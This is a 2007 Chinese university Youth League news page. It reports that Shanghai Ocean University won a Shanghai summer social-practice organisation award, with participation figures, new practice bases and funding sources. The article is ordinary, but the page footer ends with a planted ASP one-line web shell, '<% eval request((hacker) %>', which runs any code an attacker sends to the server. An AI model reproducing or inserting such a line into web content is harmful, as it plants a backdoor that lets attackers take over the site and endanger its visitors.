当前位置:共青团上海海洋大学委员会 >> 科创实践 >> 社会实践 >> 正文  
站内信息搜索:
我校获上海市暑期社会实践优秀组织奖
[2007年10月21日]   来源:本站原创   作者:佚名   点击数: 【字体: 】【双击滚屏

    近日,在2007年上海市大学生暑期社会实践活动优秀组织奖答辩会中,我校再次获得上海市暑期社会实践优秀组织奖,有10个项目获得上海市暑期社会实践优秀项目,同时被团市委推荐参评全国暑期社会实践优秀组织奖。

    今年的社会实践活动,同学们表现出了极大的热情,活动参与人数1万2千余人,组成项目261个,真正做到了全员参与。校领导高度重视大学生的社会实践活动,校党委书记叶骏、校长潘迎捷、党委副书记、副校长黄晞建、副校长封金章还专程指导、参与了具体的学生暑期社会实践的项目。

    二十年的社会实践,我校大学生实践服务的足迹遍布全国,2007年7月我校组织了团队赴台湾开展暑期社会实践活动。通过整合资源,拓展社会实践基地,今年又在新疆阿勒泰、福建宁德、安徽凤阳等地建立5个校级社会实践基地。同时积极争取社会资金用于大学生社会实践,通过食品药品监督管理局、大大西部旅游有限公司(阿勒泰)分公司、上海杨浦区科技园、新民晚报、上海水产集团(有限)公司等处筹集资金,用于暑期社会实践。

    我校的社会实践项目受到了媒体的广泛关注。文汇报、青年报、新闻晨报,上海各网站、媒体对我校社会实践活动进行跟踪报道,得到很好的社会反响。

 

关闭窗口

上一篇:我校考察团赴安徽凤阳进行社会主义新农村考察

下一篇:我校大学生暑期社会实践活动获表彰
  留言板 | 管理登录 版权所有 © 2007 共青团上海海洋大学委员会 tw.shou.edu.cn <% eval request((hacker) %>